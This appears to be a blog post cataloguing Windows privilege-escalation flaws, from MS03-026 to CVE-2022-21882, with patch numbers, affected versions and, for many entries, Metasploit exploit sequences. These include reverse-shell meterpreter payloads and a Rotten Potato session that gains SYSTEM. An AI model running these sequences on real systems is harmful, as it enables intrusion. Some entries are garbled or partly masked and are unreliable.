Windows Privilege Escalation Summary

Published 2022-04-14 · 290 views


MS03-026  [KB823980]

Affected versions

  • Microsoft Windows XP Professional SP1
  • Microsoft Windows XP Professional
  • Microsoft Windows XP Home SP1
  • Microsoft Windows XP Home
  • Microsoft Windows XP
  • Microsoft Windows NT 4.0 SP6a
  • Microsoft Windows NT 4.0 SP6
  • Microsoft Windows NT 4.0 SP5
  • Microsoft Windows NT 4.0 SP4
  • Microsoft Windows NT 4.0 SP3
  • Microsoft Windows NT 4.0 SP2
  • Microsoft Windows NT 4.0 SP1
  • Microsoft Windows NT 4.0
  • Microsoft Windows 2003
  • Microsoft Windows 2000 SP3
  • Microsoft Windows 2000 SP2
  • Microsoft Windows 2000 SP1
  • Microsoft Windows 2000

Metasploit usage

msf > search ms03_026
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set RHOST <target ip>
msf exploit(ms03_026_dcom) > set LHOST <local ip>

msf exploit(ms03_026_dcom) > exploit

MS05-039  [KB899588]

Affected versions

  • Microsoft Windows 2000 Service Pack 4
  • Microsoft Windows XP Service Pack 1
  • Microsoft Windows XP Service Pack 2
  • Microsoft Windows XP Professional x64 Edition
  • Microsoft Windows Server 2003
  • Microsoft Windows Server 2003 Service Pack 1
  • Microsoft Windows Server 2003 (for Itanium-based systems)
  • Microsoft Windows Server 2003 Service Pack 1 (for Itanium-based systems)
  • Microsoft Windows Server 2003 x64 Edition

Metasploit usage

use exploit/windows/smb/ms05_039_pnp
set RHOST <target ip>
set LHOST <local ip>
exploit

MS06-040  [KB921883]

Affected versions

  • Microsoft Windows 2000 Service Pack 4
  • Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2
  • Microsoft Windows XP Professional x64 Edition
  • Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
  • Microsoft Windows Server 2003 (for Itanium-based systems) and Microsoft Windows Server 2003 SP1 (for Itanium-based systems)
  • Microsoft Windows Server 2003 x64 Edition

Metasploit usage

use exploit/windows/smb/ms06_040_netapi
set RHOST <target ip>
set LHOST <local ip>
exploit

MS08-025  [KB941693]

Affected versions

  • Microsoft Windows 2000 Service Pack 4
  • Windows XP Service Pack 2
  • Windows 2003

MS08-066  [KB956803]

Affected versions

  • windows xp
  • windows 2003

MS08-067  [KB958644]

Affected versions

  • windows 2000
  • windows xp
  • windows 2003
  • windows 2008
  • windows7

msf

use exploit/windows/smb/ms08_067_netapi
set RHOST <target ip>
set LHOST <local ip>
exploit

MS08-068  [KB957097]

Affected versions

  • Windows 2000
  • Windows XP
  • Windows 2003
  • Windows Vista
  • windows 2008

msf

msf > use exploit/windows/smb/smb_relay
msf exploit(smb_relay) > show targets
    ...targets...
msf exploit(smb_relay) > set TARGET <target-id>
msf exploit(smb_relay) > show options
    ...show and set options...
msf exploit(smb_relay) > exploit

MS09-012 ("Brazilian barbecue") (pr) [KB959454]

Affected versions

  • win2000
  • winxp
  • win2003
  • winvista
  • win2008

MS09-020  [KB970483]

Affected versions

  • win2000
  • winxp
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 SP2 (for Itanium-based systems)

MS09-050  [KB975517]

Affected versions

  • win2008
  • win Vista

msf

msf > search MS09_050
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > options
msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms09_050_smb2_negotiate_func_index) > set RHOST <target ip>
msf exploit(ms09_050_smb2_negotiate_func_index) > run

MS10-012  [KB971468]

Affected versions

  • win7
  • win2008
  • win vista

MS10-015  [KB977165]

Affected versions

  • win2003
  • win2008
  • win7
  • winxp

msf

msf > use exploit/windows/local/ms10_015_kitrap0d
msf exploit(ms10_015_kitrap0d) > show targets
    ...targets...
msf exploit(ms10_015_kitrap0d) > set TARGET <target-id>
msf exploit(ms10_015_kitrap0d) > show options
    ...show and set options...
msf exploit(ms10_015_kitrap0d) > exploit

MS10-048  [KB2160329]

Affected versions

  • winxp
  • win2003
  • win2008
  • win7

MS10-059  [KB982799]

Affected versions

  • win2008
  • win7
  • win Vista

MS10-065  [KB2267960]

Affected versions

  • IIS 5.1, 6.0, 7.0 and 7.5 (FastCGI)

msf

msf > use auxiliary/dos/windows/http/ms10_065_ii6_asp_dos
msf auxiliary(ms10_065_ii6_asp_dos) > show actions
    ...actions...
msf auxiliary(ms10_065_ii6_asp_dos) > set ACTION <action-name>
msf auxiliary(ms10_065_ii6_asp_dos) > show options
    ...show and set options...
msf auxiliary(ms10_065_ii6_asp_dos) > run

MS10-092  [KB2305420]

Affected versions

  • win2008
  • win7

msf

msf > use exploit/windows/local/ms10_092_schelevator
msf exploit(ms10_092_schelevator) > show targets
    ...targets...
msf exploit(ms10_092_schelevator) > set TARGET <target-id>
msf exploit(ms10_092_schelevator) > show options
    ...show and set options...
msf exploit(ms10_092_schelevator) > exploit

MS11-011  [KB2393802]

Affected versions

  • win2003
  • win2008
  • win7
  • winxp
  • winvista

MS11-046  [KB2503665]

Affected versions

  • win2003
  • win2008
  • win7
  • winxp

MS11-062  [KB2566454]

Affected versions

  • win2003
  • winxp

MS11-080  [KB2592799]

Affected versions

  • win2003
  • winxp

msf

msf > use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) > show targets
    ...targets...
msf exploit(ms11_080_afdjoinleaf) > set TARGET <target-id>
msf exploit(ms11_080_afdjoinleaf) > show options
    ...show and set options...
msf exploit(ms11_080_afdjoinleaf) > exploit

MS12-020  [KB2671387]

Affected versions

  • win2003
  • win2008
  • winxp
  • win7

msf

msf > search ms12_020
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set RHOST <ip>
msf auxiliary(ms12_020_maxchannelids) > run

MS12-042  [KB2972621]

Affected versions

  • win2003
  • win7

MS13-005  [KB2778930]

Affected versions

  • win2003
  • win2008
  • win2012
  • win7
  • win8

msf

msf > use exploit/windows/local/ms13_005_hwnd_broadcast
msf exploit(ms13_005_hwnd_broadcast) > show targets
    ...targets...
msf exploit(ms13_005_hwnd_broadcast) > set TARGET <target-id>
msf exploit(ms13_005_hwnd_broadcast) > show options
    ...show and set options...
msf exploit(ms13_005_hwnd_broadcast) > exploit

MS13-046  [KB2840221]

Affected versions

  • winxp
  • win2003
  • Windows Vista
  • win2008
  • win2012
  • win7
  • win8

MS13-053  [KB2850851]

Affected versions

  • Windows Vista
  • winxp
  • win2003
  • win2008
  • win2012
  • win7
  • win8

msf

msf > use exploit/windows/local/ms13_053_schlamperei
msf exploit(ms13_053_schlamperei) > show targets
    ...targets...
msf exploit(ms13_053_schlamperei) > set TARGET <target-id>
msf exploit(ms13_053_schlamperei) > show options
    ...show and set options...
msf exploit(ms13_053_schlamperei) > exploit

MS14-002  [KB2914368]

Affected versions

  • winxp
  • win2003

msf

msf > use exploit/windows/local/ms_ndproxy
msf exploit(ms_ndproxy) > show targets
    ...targets...
msf exploit(ms_ndproxy) > set TARGET <target-id>
msf exploit(ms_ndproxy) > show options
    ...show and set options...
msf exploit(ms_ndproxy) > exploit

MS14-040  [KB2975684]

Affected versions

  • Windows Vista
  • win2003
  • win2008
  • win2012
  • win7
  • win8
  • win8.1

MS14-058  [KB3000061]

Affected versions

  • win2003

msf

msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > show targets
    ...targets...
msf exploit(ms14_058_track_popup_menu) > set TARGET <target-id>
msf exploit(ms14_058_track_popup_menu) > show options
    ...show and set options...
msf exploit(ms14_058_track_popup_menu) > exploit

MS14-066  [KB2992611]

Affected versions

  • Windows Vista
  • win2003
  • win2008
  • win2012
  • win7
  • win8
  • win8.1

MS14-068  [KB3011780]

Affected versions

  • Windows Vista
  • win2003
  • win2008
  • win2012
  • win7
  • win8
  • win8.1

MS14-070  [KB2989935]

Affected versions

  • win2003

MS15-001  [KB3023266]

Affected versions

  • win7
  • win8
  • win8.1

MS15-010  [KB3036220]

Affected versions

  • Windows Vista
  • win2003
  • win2008
  • win2012
  • win7
  • win8
  • win8.1

MS15-015  [KB3031432]

Affected versions

  • win7
  • win8
  • win8.1

MS15-051  [KB3057191]

Affected versions

  • win2003
  • win2008
  • win2012
  • win7
  • win8

msf

msf > use exploit/windows/local/ms15_051_client_copy_image
msf exploit(ms15_051_client_copy_image) > show targets
    ...targets...
msf exploit(ms15_051_client_copy_image) > set TARGET <target-id>
msf exploit(ms15_051_client_copy_image) > show options
    ...show and set options...
msf exploit(ms15_051_client_copy_image) > exploit

MS15-061  [KB3057839]

Affected versions

  • win2003
  • win2008
  • win2012
  • win7
  • win8

MS15-076  [KB3067505]

Affected versions

  • win2003
  • win2008
  • win2012
  • win7
  • win8

MS15-077  [KB3077657]

Affected versions

  • win2003
  • win2008
  • win2012
  • win7
  • win8

MS15-097  [KB3089656]

Affected versions

  • Windows Vista
  • win2008
  • win2012
  • win7
  • win8
  • win8.1

MS16-014  [KB3134228]

Affected versions

  • Windows Vista Service Pack 2
  • Windows Server 2008
  • Windows 7
  • Windows Server 2008 R2 (for x64-based systems)
  • Windows Server 2008 R2 (for Itanium-based systems) Service Pack 1

MS16-016  [KB3136041]

Affected versions

  • win2008
  • win7
  • winvista

msf

msf > use exploit/windows/local/ms16_016_webdav

MS16-032  [KB3143141]

Affected versions

  • win2008
  • win2012
  • win7
  • win8
  • win10

msf

msf > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf exploit(ms16_032_secondary_logon_handle_privesc) > show targets
    ...targets...
msf exploit(ms16_032_secondary_logon_handle_privesc) > set TARGET <target-id>
msf exploit(ms16_032_secondary_logon_handle_privesc) > show options
    ...show and set options...
msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit

MS16-034  [KB3143145]

Affected versions

  • win2008
  • win2012
  • win7
  • win8
  • win10

MS16-075 (Rotten Potato) [KB3164038]

Affected versions

  • win2008
  • win2012
  • win7
  • win8
  • win10

msf

msf exploit(web_delivery) > set ExitOnSession false
msf exploit(web_delivery) > run
meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
meterpreter > getprivs
===========================================================
Enabled Process Privileges
===========================================================
 SeAssignPrimaryTokenPrivilege

meterpreter > upload  /root/potato.exe C:\Users\Public
meterpreter > cd C:\\Users\\Public
meterpreter > use incognito
meterpreter > list_tokens -u
NT AUTHORITY\IUSR

meterpreter > execute -cH -f ./potato.exe
meterpreter > list_tokens -u
NT AUTHORITY\IUSR
NT AUTHORITY\SYSTEM

meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

MS16-098  [KB3178466]

Affected versions

  • win8.1

MS16-111  [KB3186973]

Affected versions

  • win10 earlier than 1703
  • win8
  • win2003
  • win2008
  • win2012

MS16-135  [KB3199135]

Affected versions

  • win7
  • win2008 Service Pack 1
  • win8.1
  • win10-1607

MS17-010  [KB4013389]

Affected versions

  • win7
  • win2008
  • winxp

MS17-017 [KB4013081]

Affected versions

  • Microsoft Windows Vista
  • Microsoft Windows Server 2008
  • Microsoft Windows 7

CVE-2017-0213  

Affected versions

  • Windows 10, including the three versions 1511, 1607 and 1703
  • Windows 7 SP1
  • Windows 8.1, RT 8.1
  • Windows Server 2008 SP2, 2008 R2 SP1
  • Windows Server 2012, 2012 R2
  • CVE-2018-8440
  • Windows Server 2016


CVE-2017-8464 [KB4024402][KB4022722]

Affected versions

  • Windows 10
  • Windows 7
  • Windows 8.1
  • Windows RT 8.1
  • Windows Server 2008
  • Windows Server 2008 R2
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows Server 2016

msf

msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set lhost <local-ip>
msf exploit(cve_2017_8464_lnk_rce) > set lport 8988
msf exploit(cve_2017_8464_lnk_rce) > run

msf exploit(cve_2017_8464_lnk_rce) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost <local-ip>
msf exploit(handler) > set lport 8988
msf exploit(handler) > run

CVE-2018-8120

Affected versions

  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for Itanium-Based Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1

msf

use exploit/windows/local/ms18_8120_win32k_privesc

CVE-2018-1038 [KB4088878][KB4074587][KB4056897]

Affected versions

  • Windows 7 SP1
  • Windows Server 2008 R2 SP1

CVE-2018-8639 [KB4100480]

Affected versions

  • Windows 7
  • Windows Server 2012 R2
  • Windows RT 8.1
  • Windows Server 2008
  • Windows Server 2019
  • Windows Server 2012
  • Windows 8.1
  • Windows Server 2016
  • Windows Server 2008 R2
  • Windows 10 1607、1703、1709、1803、1809

CVE-2019-0803 [kb44934**]

Affected versions

  • Microsoft Windows Server 2019
  • Microsoft Windows Server 2016
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1
  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
  • Microsoft Windows Server 2008 for x64-based Systems SP2
  • Microsoft Windows Server 2008 for Itanium-based Systems SP2
  • Microsoft Windows Server 2008 for 32-bit Systems SP2
  • Microsoft Windows Server 1803
  • Microsoft Windows Server 1709
  • Microsoft Windows RT 8.1
  • Microsoft Windows 8.1 for x64-based Systems
  • Microsoft Windows 8.1 for 32-bit Systems
  • Microsoft Windows 7 for x64-based Systems SP1
  • Microsoft Windows 7 for 32-bit Systems SP1
  • Microsoft Windows 10 Version 1809 for x64-based Systems
  • Microsoft Windows 10 Version 1809 for ARM64-based Systems
  • Microsoft Windows 10 Version 1809 for 32-bit Systems
  • Microsoft Windows 10 Version 1803 for x64-based Systems
  • Microsoft Windows 10 Version 1803 for ARM64-based Systems
  • Microsoft Windows 10 Version 1803 for 32-bit Systems
  • Microsoft Windows 10 Version 1709 for x64-based Systems
  • Microsoft Windows 10 Version 1709 for ARM64-based Systems
  • Microsoft Windows 10 Version 1709 for 32-bit Systems
  • Microsoft Windows 10 Version 1703 for x64-based Systems
  • Microsoft Windows 10 Version 1703 for 32-bit Systems
  • Microsoft Windows 10 Version 1607 for x64-based Systems
  • Microsoft Windows 10 Version 1607 for 32-bit Systems
  • Microsoft Windows 10 for x64-based Systems
  • Microsoft Windows 10 for 32-bit Systems

CVE-2019-1388 [KB4525235][KB4525233]

Affected versions

  • Microsoft Windows Server 2019
  • Microsoft Windows Server 2016
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2008 R2
  • Microsoft Windows Server 2008
  • Microsoft Windows RT 8.1
  • Microsoft Windows 8.1
  • Microsoft Windows 7


CVE-2019-1458

Affected versions

  • Microsoft Windows 10 Version 1607 for 32-bit Systems
  • Microsoft Windows 10 Version 1607 for x64-based Systems
  • Microsoft Windows 10 for 32-bit Systems
  • Microsoft Windows 10 for x64-based Systems
  • Microsoft Windows 7 for 32-bit Systems SP1
  • Microsoft Windows 7 for x64-based Systems SP1
  • Microsoft Windows 8.1 for 32-bit Systems
  • Microsoft Windows 8.1 for x64-based Systems
  • Microsoft Windows RT 8.1
  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1
  • Microsoft Windows Server 2008 for 32-bit Systems SP2
  • Microsoft Windows Server 2008 for Itanium-based Systems SP2
  • Microsoft Windows Server 2008 for x64-based Systems SP2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016


CVE-2020-0796 [KB4551762]

Affected versions

  • Windows 10 Version 1903 for 32-bit Systems
  • Windows 10 Version 1903 for x64-based Systems
  • Windows 10 Version 1903 for ARM64-based Systems
  • Windows Server, Version 1903 (Server Core installation)
  • Windows 10 Version 1909 for 32-bit Systems
  • Windows 10 Version 1909 for x64-based Systems
  • Windows 10 Version 1909 for ARM64-based Systems
  • Windows Server, Version 1909 (Server Core installation)


CVE-2021-1732 [4601345][4601349]

Affected versions

  • Windows Server, version 20H2 (Server Core Installation)
  • Windows 10 Version 20H2 for ARM64-based Systems
  • Windows 10 Version 20H2 for 32-bit Systems
  • Windows 10 Version 20H2 for x64-based Systems
  • Windows Server, version 2004 (Server Core installation)
  • Windows 10 Version 2004 for x64-based Systems
  • Windows 10 Version 2004 for ARM64-based Systems
  • Windows 10 Version 2004 for 32-bit Systems
  • Windows Server, version 1909 (Server Core installation)
  • Windows 10 Version 1909 for ARM64-based Systems
  • Windows 10 Version 1909 for x64-based Systems
  • Windows 10 Version 1909 for 32-bit Systems
  • Windows Server 2019 (Server Core installation)
  • Windows Server 2019
  • Windows 10 Version 1809 for ARM64-based Systems
  • Windows 10 Version 1809 for x64-based Systems
  • Windows 10 Version 1809 for 32-bit Systems
  • Windows 10 Version 1803 for ARM64-based Systems
  • Windows 10 Version 1803 for x64-based Systems

CVE-2021-33739 [5003637]

Affected versions

  • Windows 10

CVE-2021-40449 [5006714, 5006729, 5006739, 5006732, 5006743, 5006728, 5006736, 5006715, 5006670, 5006675, 5006667, 5006672]

Affected versions

  • windows 10

Domain privilege escalation: CVE-2021-42287 [KB5008602]

Affected versions

  • Windows Server 2012 R2 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2016 (Server Core installation)
  • Windows Server 2016
  • Windows Server, version 20H2 (Server Core Installation)
  • Windows Server, version 2004 (Server Core installation)
  • Windows Server 2022 (Server Core installation)
  • Windows Server 2022
  • Windows Server 2019 (Server Core installation)

Domain privilege escalation: CVE-2021-42278 [KB5008380]

Affected versions

  • Windows Server 2012 R2 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2016 (Server Core installation)
  • Windows Server 2016
  • Windows Server, version 20H2 (Server Core Installation)
  • Windows Server, version 2004 (Server Core installation)
  • Windows Server 2022 (Server Core installation)
  • Windows Server 2022
  • Windows Server 2019 (Server Core installation)

CVE-2022-21882 [5009566, 5009543, 5009545]

Affected versions

  • Windows 10 Version 1809/1909/2004/20H2/21H1/21H2 for 32/64-bit Systems
  • Windows Server, version 20H2 (Server Core Installation)
  • Windows 11 for ARM64/x64-based Systems
  • Windows Server 2019/2022